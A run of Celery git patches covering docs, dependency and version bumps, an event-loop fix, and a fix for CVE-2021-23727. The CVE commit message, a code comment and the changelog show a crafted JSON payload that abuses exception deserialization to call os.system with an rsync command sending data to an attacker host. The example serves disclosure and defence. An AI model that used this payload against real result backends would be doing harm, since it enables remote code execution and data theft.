+chunking logic to your task to reduce peak memory usage.
+
+Celery workers have two main ways to help reduce memory usage due to the "high
+watermark" and/or memory leaks in child processes: the
+:setting:`worker_max_tasks_per_child` and :setting:`worker_max_memory_per_child`
+settings.
+
+You must be careful not to set these settings too low, or else your workers
+will spend most of their time restarting child processes instead of processing
+tasks. For example, if you use a :setting:`worker_max_tasks_per_child` of 1
+and your child process takes 1 second to start, then that child process would
+only be able to process a maximum of 60 tasks per minute (assuming the task ran
+instantly). A similar issue can occur when your tasks always exceed
+:setting:`worker_max_memory_per_child`.
+
+
.. rubric:: Footnotes
.. [*] The chapter is available to read for free here:
From a5f140bce9800221e8f68b9f5493e4ba4e4bc3b4 Mon Sep 17 00:00:00 2001
From: Ori Avtalion
Date: Sat, 25 Dec 2021 12:45:01 +0200
Subject: [PATCH 168/177] Add changelog to PyPI sidebar
---
setup.py | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/setup.py b/setup.py
index 6b41a8a71a6..da60b24b2d3 100755
--- a/setup.py
+++ b/setup.py
@@ -175,7 +175,8 @@ def run_tests(self):
]
},
project_urls={
- "Documentation": "http://docs.celeryproject.org/en/latest/index.html",
+ "Documentation": "https://docs.celeryproject.org/en/latest/index.html",
+ "Changelog": "https://docs.celeryproject.org/en/stable/changelog.html",
"Code": "https://github.com/celery/celery",
"Tracker": "https://github.com/celery/celery/issues",
"Funding": "https://opencollective.com/celery"
From 527458d8d419cb41b74c5b05aaa8ddf957704f84 Mon Sep 17 00:00:00 2001
From: Paul Brown
Date: Fri, 24 Dec 2021 22:41:36 -0600
Subject: [PATCH 169/177] prevent duplication in event loop on Consumer restart
---
celery/concurrency/asynpool.py | 9 ++++++++-
t/unit/concurrency/test_prefork.py | 11 +++++++++++
2 files changed, 19 insertions(+), 1 deletion(-)
diff --git a/celery/concurrency/asynpool.py b/celery/concurrency/asynpool.py
index d5d2bdb5124..b9f2875a261 100644
--- a/celery/concurrency/asynpool.py
+++ b/celery/concurrency/asynpool.py
@@ -405,6 +405,9 @@ class AsynPool(_pool.Pool):
ResultHandler = ResultHandler
Worker = Worker
+ #: Set by :meth:`register_with_event_loop` after running the first time.
+ _registered_with_event_loop = False
+
def WorkerProcess(self, worker):
worker = super().WorkerProcess(worker)
worker.dead = False
@@ -523,7 +526,11 @@ def register_with_event_loop(self, hub):
for handler, interval in self.timers.items():
hub.call_repeatedly(interval, handler)
- hub.on_tick.add(self.on_poll_start)
+ # Add on_poll_start to the event loop only once to prevent duplication
+ # when the Consumer restarts due to a connection error.
+ if not self._registered_with_event_loop:
+ hub.on_tick.add(self.on_poll_start)
+ self._registered_with_event_loop = True
def _create_timelimit_handlers(self, hub):
"""Create handlers used to implement time limits."""
diff --git a/t/unit/concurrency/test_prefork.py b/t/unit/concurrency/test_prefork.py
index 2e2a47353b7..241dc93a0dc 100644
--- a/t/unit/concurrency/test_prefork.py
+++ b/t/unit/concurrency/test_prefork.py
@@ -344,6 +344,17 @@ def _fake_hub(*args, **kwargs):
# Then: all items were removed from the managed data source
assert fd_iter == {}, "Expected all items removed from managed dict"
+ def test_register_with_event_loop__no_on_tick_dupes(self):
+ """Ensure AsynPool's register_with_event_loop only registers
+ on_poll_start in the event loop the first time it's called. This
+ prevents a leak when the Consumer is restarted.
+ """
+ pool = asynpool.AsynPool(threads=False)
+ hub = Mock(name='hub')
+ pool.register_with_event_loop(hub)
+ pool.register_with_event_loop(hub)
+ hub.on_tick.add.assert_called_once()
+
@t.skip.if_win32
class test_ResultHandler:
From 5c3f1559df16c32fb8d82918b4497f688d42ad0a Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Sun, 26 Dec 2021 13:35:21 +0200
Subject: [PATCH 170/177] Fix CVE-2021-23727 (Stored Command Injection security
vulnerability).
When a task fails, the failure information is serialized in the backend.
In some cases, the exception class is only importable from the
consumer's code base. In this case, we reconstruct the exception class
so that we can re-raise the error on the process which queried the
task's result. This was introduced in #4836.
If the recreated exception type isn't an exception, this is a security issue.
Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
`os.system("rsync /data attacker@192.168.56.100:~/data")`
by setting the task's result to a failure in the result backend with the os,
the system function as the exception type and the payload `rsync /data attacker@192.168.56.100:~/data` as the exception arguments like so:
```json
{
"exc_module": "os",
 "exc_type": "system",
"exc_message": "rsync /data attacker@192.168.56.100:~/data"
}
```
According to my analysis, this vulnerability can only be exploited if
the producer delayed a task which runs long enough for the
attacker to change the result mid-flight, and the producer has
polled for the task's result.
The attacker would also have to gain access to the result backend.
The severity of this security vulnerability is low, but we still
recommend upgrading.
---
celery/backends/base.py | 94 +++++++++++++++++++++++++-----------
t/unit/backends/test_base.py | 28 ++++++++++-
2 files changed, 94 insertions(+), 28 deletions(-)
diff --git a/celery/backends/base.py b/celery/backends/base.py
index ffbd1d0307c..094cbf86921 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -25,7 +25,8 @@
from celery.app.task import Context
from celery.exceptions import (BackendGetMetaError, BackendStoreError,
ChordError, ImproperlyConfigured,
- NotRegistered, TaskRevokedError, TimeoutError)
+ NotRegistered, SecurityError, TaskRevokedError,
+ TimeoutError)
from celery.result import (GroupResult, ResultBase, ResultSet,
allow_join_result, result_from_tuple)
from celery.utils.collections import BufferMap
@@ -338,34 +339,73 @@ def prepare_exception(self, exc, serializer=None):
def exception_to_python(self, exc):
"""Convert serialized exception to Python exception."""
- if exc:
- if not isinstance(exc, BaseException):
- exc_module = exc.get('exc_module')
- if exc_module is None:
- cls = create_exception_cls(
- from_utf8(exc['exc_type']), __name__)
- else:
- exc_module = from_utf8(exc_module)
- exc_type = from_utf8(exc['exc_type'])
- try:
- # Load module and find exception class in that
- cls = sys.modules[exc_module]
- # The type can contain qualified name with parent classes
- for name in exc_type.split('.'):
- cls = getattr(cls, name)
- except (KeyError, AttributeError):
- cls = create_exception_cls(exc_type,
- celery.exceptions.__name__)
- exc_msg = exc['exc_message']
- try:
- if isinstance(exc_msg, (tuple, list)):
- exc = cls(*exc_msg)
- else:
- exc = cls(exc_msg)
- except Exception as err: # noqa
- exc = Exception(f'{cls}({exc_msg})')
+ if not exc:
+ return None
+ elif isinstance(exc, BaseException):
if self.serializer in EXCEPTION_ABLE_CODECS:
exc = get_pickled_exception(exc)
+ return exc
+ elif not isinstance(exc, dict):
+ try:
+ exc = dict(exc)
+ except TypeError as e:
+ raise TypeError(f"If the stored exception isn't an "
+ f"instance of "
+ f"BaseException, it must be a dictionary.\n"
+ f"Instead got: {exc}") from e
+
+ exc_module = exc.get('exc_module')
+ try:
+ exc_type = exc['exc_type']
+ except KeyError as e:
+            raise ValueError("Exception information must include "
+                             "the exception type") from e
+ if exc_module is None:
+ cls = create_exception_cls(
+ exc_type, __name__)
+ else:
+ try:
+ # Load module and find exception class in that
+ cls = sys.modules[exc_module]
+ # The type can contain qualified name with parent classes
+ for name in exc_type.split('.'):
+ cls = getattr(cls, name)
+ except (KeyError, AttributeError):
+ cls = create_exception_cls(exc_type,
+ celery.exceptions.__name__)
+ exc_msg = exc.get('exc_message', '')
+
+ # If the recreated exception type isn't indeed an exception,
+ # this is a security issue. Without the condition below, an attacker
+ # could exploit a stored command vulnerability to execute arbitrary
+ # python code such as:
+ # os.system("rsync /data attacker@192.168.56.100:~/data")
+ # The attacker sets the task's result to a failure in the result
+ # backend with the os as the module, the system function as the
+ # exception type and the payload
+ # rsync /data attacker@192.168.56.100:~/data
+ # as the exception arguments like so:
+ # {
+ # "exc_module": "os",
+ # "exc_type": "system",
+ # "exc_message": "rsync /data attacker@192.168.56.100:~/data"
+ # }
+ if not isinstance(cls, type) or not issubclass(cls, BaseException):
+ fake_exc_type = exc_type if exc_module is None else f'{exc_module}.{exc_type}'
+ raise SecurityError(
+ f"Expected an exception class, got {fake_exc_type} with payload {exc_msg}")
+
+ # XXX: Without verifying `cls` is actually an exception class,
+ # an attacker could execute arbitrary python code.
+ # cls could be anything, even eval().
+ try:
+ if isinstance(exc_msg, (tuple, list)):
+ exc = cls(*exc_msg)
+ else:
+ exc = cls(exc_msg)
+ except Exception as err: # noqa
+ exc = Exception(f'{cls}({exc_msg})')
+
return exc
def prepare_value(self, result):
diff --git a/t/unit/backends/test_base.py b/t/unit/backends/test_base.py
index 3436053871d..203cbfdd534 100644
--- a/t/unit/backends/test_base.py
+++ b/t/unit/backends/test_base.py
@@ -1,3 +1,4 @@
+import re
from contextlib import contextmanager
from unittest.mock import ANY, MagicMock, Mock, call, patch, sentinel
@@ -11,7 +12,7 @@
from celery.backends.base import (BaseBackend, DisabledBackend,
KeyValueStoreBackend, _nulldict)
from celery.exceptions import (BackendGetMetaError, BackendStoreError,
- ChordError, TimeoutError)
+ ChordError, SecurityError, TimeoutError)
from celery.result import result_from_tuple
from celery.utils import serialization
from celery.utils.functional import pass1
@@ -581,6 +582,31 @@ def test_exception_to_python_when_None(self):
b = BaseBackend(app=self.app)
assert b.exception_to_python(None) is None
+ def test_not_an_actual_exc_info(self):
+ pass
+
+ def test_not_an_exception_but_a_callable(self):
+ x = {
+ 'exc_message': ('echo 1',),
+ 'exc_type': 'system',
+ 'exc_module': 'os'
+ }
+
+ with pytest.raises(SecurityError,
+ match=re.escape(r"Expected an exception class, got os.system with payload ('echo 1',)")):
+ self.b.exception_to_python(x)
+
+ def test_not_an_exception_but_another_object(self):
+ x = {
+ 'exc_message': (),
+ 'exc_type': 'object',
+ 'exc_module': 'builtins'
+ }
+
+ with pytest.raises(SecurityError,
+ match=re.escape(r"Expected an exception class, got builtins.object with payload ()")):
+ self.b.exception_to_python(x)
+
def test_exception_to_python_when_attribute_exception(self):
b = BaseBackend(app=self.app)
test_exception = {'exc_type': 'AttributeDoesNotExist',
From 7384b14a6fe57b3dbcddea20714c91196df1bd03 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Sun, 26 Dec 2021 16:12:41 +0200
Subject: [PATCH 171/177] Fix changelog formatting.
---
Changelog.rst | 18 ++++++++++++------
1 file changed, 12 insertions(+), 6 deletions(-)
diff --git a/Changelog.rst b/Changelog.rst
index 84d02ba3ae2..0d138c98bd6 100644
--- a/Changelog.rst
+++ b/Changelog.rst
@@ -12,14 +12,15 @@ an overview of what's new in Celery 5.2.
.. _version-5.2.1:
5.2.1
-=======
+=====
+
:release-date: 2021-11-16 8.55 P.M UTC+6:00
:release-by: Asif Saif Uddin
- Fix rstrip usage on bytes instance in ProxyLogger.
- Pass logfile to ExecStop in celery.service example systemd file.
- fix: reduce latency of AsyncResult.get under gevent (#7052)
-- Limit redis version: <4.0.0.
+- Limit redis version: <4.0.0.
- Bump min kombu version to 5.2.2.
- Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
- Remove dependency to case (#7077).
@@ -31,20 +32,22 @@ an overview of what's new in Celery 5.2.
.. _version-5.2.0:
5.2.0
-=======
+=====
+
:release-date: 2021-11-08 7.15 A.M UTC+6:00
:release-by: Asif Saif Uddin
- Prevent from subscribing to empty channels (#7040)
- fix register_task method.
- Fire task failure signal on final reject (#6980)
-- Limit pymongo version: <3.12.1 (#7041)
+- Limit pymongo version: <3.12.1 (#7041)
- Bump min kombu version to 5.2.1
.. _version-5.2.0rc2:
5.2.0rc2
-=======
+========
+
:release-date: 2021-11-02 1.54 P.M UTC+3:00
:release-by: Naomi Elstein
@@ -72,7 +75,7 @@ an overview of what's new in Celery 5.2.
.. _version-5.2.0rc1:
5.2.0rc1
-=======
+========
:release-date: 2021-09-26 4.04 P.M UTC+3:00
:release-by: Omer Katz
@@ -99,6 +102,7 @@ an overview of what's new in Celery 5.2.
5.2.0b3
=======
+
:release-date: 2021-09-02 8.38 P.M UTC+3:00
:release-by: Omer Katz
@@ -126,6 +130,7 @@ an overview of what's new in Celery 5.2.
5.2.0b2
=======
+
:release-date: 2021-08-17 5.35 P.M UTC+3:00
:release-by: Omer Katz
@@ -140,6 +145,7 @@ an overview of what's new in Celery 5.2.
5.2.0b1
=======
+
:release-date: 2021-08-11 5.42 P.M UTC+3:00
:release-by: Omer Katz
From 815e652284c5ccf3904e081ee958efc5da095687 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Sun, 26 Dec 2021 16:27:26 +0200
Subject: [PATCH 172/177] Add changelog for 5.2.2.
---
Changelog.rst | 38 ++++++++++++++++++++++++++++++++++++++
1 file changed, 38 insertions(+)
diff --git a/Changelog.rst b/Changelog.rst
index 0d138c98bd6..c5cfddf4075 100644
--- a/Changelog.rst
+++ b/Changelog.rst
@@ -8,6 +8,44 @@ This document contains change notes for bugfix & new features
in the & 5.2.x series, please see :ref:`whatsnew-5.2` for
an overview of what's new in Celery 5.2.
+.. _version-5.2.2:
+
+5.2.2
+=====
+
+:release-date: 2021-12-26 16:30 P.M UTC+2:00
+:release-by: Omer Katz
+
+- Various documentation fixes.
+- Fix CVE-2021-23727 (Stored Command Injection security vulnerability).
+
+ When a task fails, the failure information is serialized in the backend.
+ In some cases, the exception class is only importable from the
+ consumer's code base. In this case, we reconstruct the exception class
+ so that we can re-raise the error on the process which queried the
+ task's result. This was introduced in #4836.
+ If the recreated exception type isn't an exception, this is a security issue.
+ Without the condition included in this patch, an attacker could inject a remote code execution instruction such as:
+ ``os.system("rsync /data attacker@192.168.56.100:~/data")``
+ by setting the task's result to a failure in the result backend with the os,
+ the system function as the exception type and the payload ``rsync /data attacker@192.168.56.100:~/data`` as the exception arguments like so:
+
+ .. code-block:: python
+
+ {
+ "exc_module": "os",
+            "exc_type": "system",
+ "exc_message": "rsync /data attacker@192.168.56.100:~/data"
+ }
+
+ According to my analysis, this vulnerability can only be exploited if
+ the producer delayed a task which runs long enough for the
+ attacker to change the result mid-flight, and the producer has
+ polled for the task's result.
+ The attacker would also have to gain access to the result backend.
+ The severity of this security vulnerability is low, but we still
+ recommend upgrading.
+
.. _version-5.2.1:
From d497b3e39b099f016f784153a16b75ea4d653267 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 27 Dec 2021 16:44:22 +0000
Subject: [PATCH 173/177] [pre-commit.ci] pre-commit autoupdate
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
updates:
- [github.com/pre-commit/pre-commit-hooks: v4.0.1 → v4.1.0](https://github.com/pre-commit/pre-commit-hooks/compare/v4.0.1...v4.1.0)
---
.pre-commit-config.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index 8e2429511ac..43bde9e08b5 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -16,7 +16,7 @@ repos:
- id: yesqa
- repo: https://github.com/pre-commit/pre-commit-hooks
- rev: v4.0.1
+ rev: v4.1.0
hooks:
- id: check-merge-conflict
- id: check-toml
From c79d5c79c1c212b1f7e5036b7dca18568eae68de Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Tue, 28 Dec 2021 09:45:37 +0600
Subject: [PATCH 174/177] try to make linters happy (#7193)
---
celery/backends/base.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/celery/backends/base.py b/celery/backends/base.py
index 094cbf86921..86286ca9df5 100644
--- a/celery/backends/base.py
+++ b/celery/backends/base.py
@@ -16,7 +16,7 @@
from billiard.einfo import ExceptionInfo
from kombu.serialization import dumps, loads, prepare_accept_content
from kombu.serialization import registry as serializer_registry
-from kombu.utils.encoding import bytes_to_str, ensure_bytes, from_utf8
+from kombu.utils.encoding import bytes_to_str, ensure_bytes
from kombu.utils.url import maybe_sanitize_url
import celery.exceptions
From d4b97bedc79aed0b45dd3720b683d8d8572da2a9 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Wed, 29 Dec 2021 11:23:04 +0600
Subject: [PATCH 175/177] try newer bumped versions (#7194)
---
requirements/default.txt | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/requirements/default.txt b/requirements/default.txt
index 3be20593c97..509a43d9e5e 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -1,9 +1,9 @@
-pytz>0.dev.0
+pytz>=2021.3
billiard>=3.6.4.0,<4.0
-kombu>=5.2.2,<6.0
+kombu>=5.2.3,<6.0
vine>=5.0.0,<6.0
-click>=8.0,<9.0
+click>=8.0.3,<9.0
click-didyoumean>=0.0.3
click-repl>=0.2.0
click-plugins>=1.1.1
-setuptools
+setuptools>=59.1.1,<59.7.0
From 9532c73badd627457d4e543ba85fbfb9f6720de2 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Wed, 29 Dec 2021 11:35:30 +0600
Subject: [PATCH 176/177] Changelog for v5.2.3
---
Changelog.rst | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
diff --git a/Changelog.rst b/Changelog.rst
index c5cfddf4075..daf7b52e019 100644
--- a/Changelog.rst
+++ b/Changelog.rst
@@ -8,6 +8,25 @@ This document contains change notes for bugfix & new features
in the & 5.2.x series, please see :ref:`whatsnew-5.2` for
an overview of what's new in Celery 5.2.
+.. _version-5.2.3:
+
+5.2.3
+=====
+
+:release-date: 2021-12-29 12:00 P.M UTC+6:00
+:release-by: Asif Saif Uddin
+
+- Allow redis >= 4.0.2.
+- Upgrade minimum required pymongo version to 3.11.1.
+- tested pypy3.8 beta (#6998).
+- Split Signature.__or__ into subclasses' __or__ (#7135).
+- Prevent duplication in event loop on Consumer restart.
+- Restrict setuptools>=59.1.1,<59.7.0.
+- Kombu bumped to v5.2.3
+- py-amqp bumped to v5.0.9
+- Some docs & CI improvements.
+
+
.. _version-5.2.2:
5.2.2
From 56275f5c85247435c14d84807ad254b0f33913c8 Mon Sep 17 00:00:00 2001
From: Asif Saif Uddin
Date: Wed, 29 Dec 2021 11:49:42 +0600
Subject: [PATCH 177/177] =?UTF-8?q?Bump=20version:=205.2.2=20=E2=86=92=205?=
=?UTF-8?q?.2.3?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.bumpversion.cfg | 2 +-
README.rst | 2 +-
celery/__init__.py | 2 +-
docs/includes/introduction.txt | 4 ++--
4 files changed, 5 insertions(+), 5 deletions(-)
diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index ad96c6ecbea..1a7dbf3b05d 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.2.1
+current_version = 5.2.3
commit = True
tag = True
parse = (?P\d+)\.(?P\d+)\.(?P\d+)(?P[a-z\d]+)?
diff --git a/README.rst b/README.rst
index 03bbec6f613..d82ab9995ae 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.2.1 (dawn-chorus)
+:Version: 5.2.3 (dawn-chorus)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
diff --git a/celery/__init__.py b/celery/__init__.py
index 320228e92ca..df1fe1a6c05 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -17,7 +17,7 @@
SERIES = 'dawn-chorus'
-__version__ = '5.2.1'
+__version__ = '5.2.3'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 50292b1d7aa..0e97f80ffa0 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,5 +1,5 @@
-:Version: 5.2.1 (cliffs)
-:Web: http://celeryproject.org/
+:Version: 5.2.3 (dawn-chorus)
+:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
:Keywords: task, queue, job, async, rabbitmq, amqp, redis,